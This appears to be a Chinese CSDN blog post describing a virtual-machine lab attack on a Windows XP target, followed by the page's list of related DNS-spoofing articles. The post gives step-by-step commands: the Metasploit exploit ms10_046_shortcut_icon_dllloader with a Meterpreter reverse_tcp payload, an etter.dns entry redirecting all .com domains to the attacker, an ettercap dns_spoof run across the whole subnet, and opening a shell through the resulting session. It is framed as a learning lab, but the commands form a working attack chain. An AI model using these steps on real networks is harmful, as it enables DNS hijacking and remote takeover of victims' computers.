记一次虚拟机环境的dns劫持实验

最新推荐文章于 2024-07-30 18:48:34 发布

黑暗巫妖

最新推荐文章于 2024-07-30 18:48:34 发布

阅读量1.1k

点赞数 3

分类专栏：信息安全

本文链接：https://blog.csdn.net/dlc0313/article/details/83899024

版权

信息安全专栏收录该内容

2 篇文章 0 订阅

订阅专栏

环境，kali虚拟机和winXP虚拟机

XP虚拟机别打太多补丁，毕竟为了试验

首先，两台电脑都打开

接下来，对kali进行操作

首先查看ip和网卡

指令ifconfig

接着打开Metasploit命令行模式

指令msfconsole

选择漏洞利用攻击模块

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

然后配置攻击的参数

设置SRVHOST

set SRVHOST kali的ip

选择攻击载荷反弹ip模式

set PAYLOAD windows/meterpreter/reverse_tcp

设置LHOST

set LHOST kali的ip

通过exploit命令发起攻击

配置ettercap工具进行dns欺骗

编辑etter.dns

vim /etc/ettercap/etter.dns

注意 BT5和kali的etter位置不同，用bt5的请自行百度

添加A记录，如，使.com的域名全部被劫持

*.com A kali的ip

接下来就可以开始欺骗攻击了

ettercap -T -i 网卡编号 -q –P dns_spoof /// ///

这是对全网段进行欺骗

此时，xp虚拟机ping任何一个.com域名时，ping的ip都会变成kali的ip

当kali的msfconsole中显示Meterpreter session 1 opened时，说明已经攻击成功

此时可以输入sessions指令查看被攻击的主机

通过指令sessions –i 主机id号，可以对主机进行操作，比如输入shell指令，就可以通过shell控制目标机

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

黑暗巫妖

关注关注

3
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

DNS劫持攻击实验

文武老司机的博客

12-24

2174

DNS劫持攻击： 0x01 攻击目的：劫持靶机的DNS请求，将靶机所有的http请求流量都引导到攻击机搭建的web服务器（shadow website）供靶机访问。 0x02 环境介绍：攻击机：Kali linux 靶机：ubuntu 20.04 存在形式：vmware之虚机联网方式：NAT IP地址： Gateway：192.168.8.2/24 Kali linux：192.168.8.128/24

ettercap内网DNS劫持实验

向往天空的鱼

05-11

1389

ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应的MAC地址。 ARP欺骗是一种中间人攻击，攻击者通过毒化受害者的ARP缓存，将网关的MAC替换成攻击者的MAC，于是攻击者的主机实际上就充当了受害主机的网关，之后攻击者就可以截获受害者发出和接到的数据包，从中获取账号密码、银行卡信息等。 ...

参与评论您还未登录，请先登录后发表或查看评论

ARP欺骗与DNS劫持实验详解

最新发布

weixin_67832625的博客

07-30

408

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

计算机网络 day14 DNS域名劫持、DNS域名污染 - CDN的工作流程 - DNS的记录类型 - 搭建DNS缓存/主域名服务器 - DNAT-SNAT实验项目

lpfstudy的博客

07-28

2369

CDN使用Anycast技术，将相同的IP地址分配给全球不同地区的服务器节点，用户请求将导向离用户最近的服务器，从而实现高效的内容交付。CDN提供商会在DNS解析层面进行优化，通过返回离用户最近的CDN节点的IP地址，将用户的请求导向最近的节点，从而实现就近访问。本地DNS服务器会将DNS解析请求发送给CDN加速DNS，并由CDN加速DNS返回离用户最近的CDN节点的IP地址，而不是源服务器的IP地址。CDN会在边缘节点上缓存动态内容的副本，并与源服务器进行实时同步，以确保用户获取最新的内容。

劫持DNS通过流量植入木马实验

Uzizi的博客

06-01

1388

劫持DNS通过流量植入木马实验

网络攻防之ARP欺骗和DNS劫持实验

m0_62574258的博客

02-24

2510

实验环境：攻击主机：kali2023虚拟机，IP地址为192.168.133.141靶机：Windows10虚拟机，IP地址为192.168.133.129网关地址：192.168.133.2(1)ARP协议介绍在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。这个目标主机的MAC地址就是通过地址解析协议ARP获得的。ARP协议中通常有两种数据包：ARP请求包和ARP应答包。

Windows实验——DNS劫持演练

浅浅的博客

03-08

4325

一、实验环境钓鱼网站：虚拟机Windows Server 2008的缺省网站 IP：192.168.43.44 攻击者：物理机Win 10 IP：192.168.43.89 被攻击者：物理机Win 7 ...

python实现dns劫持_Python程序之DNS劫持

weixin_39530557的博客

12-15

828

实验环境：虚假网站端：虚拟机Windowsserver 2008攻击机：Windows7靶机端：Windows10实验步骤：设置虚拟机网络适配器为桥接模式虚拟机设备设置编辑虚拟网络编辑器查询Windowsserver 2008的IP地址并搭建自己的网站新建一个自己的网站(即攻击后劫持网站)编写DNS劫持代码from scapy.all import *import sysimp...

DNS原理及实验

weixin_44841019的博客

04-17

3356

目录一、DNS—域名系统二、DNS的域名结构三、DNS服务器类型四、构建DNS域名解析服务器一、DNS—域名系统 1、DNS定义：DNS是“域名系统”的英文缩写。它作为将域名和IP地址相互映射的一个分布式数据库，能够使人更方便地访问互联网。 2、DNS使用端口：DNS服务使用TCP和UDP的53端口，TCP的53端口用于连接DNS服务器，UDP的53端口用于解析DNS。 3、DNS域名长度限制：每一级域名长度的限制是63个字符，域名总长度则不能超过253个字符 4、DNS作用：正向解析:根据域名查找对应

DNS劫持如何预防、DNS是什么？DNS劫持详解

douya0012的博客

01-04

1554

在前两天的时候，打开www.linux.org的时候突然发现，页面跟原来完全不一样了，里面各种fk，第一反应就是网站被黑了，攻击者对于该站非常不满，还有一张“菊花图”，场面异常火爆，有兴趣可看这个报道。后来网站官方说网站被黑是一起DNS劫持事件，对于网站被黑感到啼笑之余，也同时让我好奇DNS劫持到底是什么，攻击威力如此大。 DNS是什么 DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务，本地默认占用53端口，它本身的实质上一个域名和ip的数据库服务器，他要完成的

netkit-ng+bind+scapy的旁路抢答DNS污染实验报告

12-24

1.使用工具“netkit-ng”在虚拟机（kali linux 2016 amd64）里搭建模拟的网络环境 2.使用python的scapy模块伪造DNS应答包，并发送给DNS缓存服务器（dns-local），从而污染DNS缓存服务器的缓存记录，使客户端（client）在访问域名“facebook.com”时，接收到来自DNS缓存服务器的已被攻击者污染的地址记录。最后使客户端实际访问到的是攻击者的web服务器（attserver）中的网页。

网络劫持易语言源码可以拦截ip

01-30

网络劫持易语言源码可以拦截ip 100%可以用

易语言DNS切换

08-20

易语言DNS切换源码系统结构:易语言DNS切换源码,DNS切换 ======窗口程序集1 || ||------__启动窗口_创建完毕 || ||------_按钮1_被单击 || ||------_按钮2_被单击

vulhub通关实战一（附docker vulhub 虚拟机环境）

悦分享

12-26

1596

docker vulhub 虚拟机环境：docker-compose up -d 启动服务：登录7001端口用户名weblogic，密码Oracle@123。

DNS劫持（记录）

weixin_44300286的博客

11-26

371

一、什么是DNS欺骗 DNS（英文：Domain Name System）域名系统，主要用来把域名(domain name)转换为与之相对应的IP地址 (IP address)。 DNS工作原理： 1、客户端输入域名，查询本地缓存 2、本地DNS服务器查询，本地DNS服务器内部缓存 3、本地DNS向根域名服务器查询，根域服务器返回一级域地址 4、本地DNS向根域返回的一级域服务器查询，一级域的本地缓存 5、查询到终结果，返回给本地DNS服务器 6、本地DNS服务器，将解析的结果返回客户端 7、客户端根据返回

DNS污染实验

2201_75772809的博客

12-29

185

DNS劫持

qq_61142406的博客

02-13

3422

均在本地模拟，请不要用于非法途径小白学习，如有错误或者建议还请提出先了解一下dns协议，当然dns也能做隐藏隧道，，，后续写上 DNS协议是用来将域名转换为IP地址（也可以将IP地址转换为相应的域名地址） dns劫持：实验环境： Windows10(靶机) 192.168.64.139，kali Linux(攻击机) 192.168.64.133 均为NAT模式，保证在同一个网关，能够通信，可以用ping测试(windows默认ping四次，Linux默认一直ping，可以加一个参数 -c 来指定

网络安全 - DNS劫持原理 + 实验

z339521的博客

06-14

2633

DNSDNS（Domain Name System）即域名系统。我们常说的 DNS 是域名解析协议。DNS 协议提供域名到 IP 地址之间的解析服务。计算机既可以被赋予 IP 地址，也可以被赋予主机名和域名。用户通常使用主机名或域名来访问对方的计算机，而不是直接通过 IP 地址访问。因为与 IP 地址的一组纯数字相比，用字母配合数字的表示形式来指定计算机名更符合人类的记忆习惯。但要让计算机去理解名称，相对而言就变得困难了。因为计算机更擅长处理一长串数字。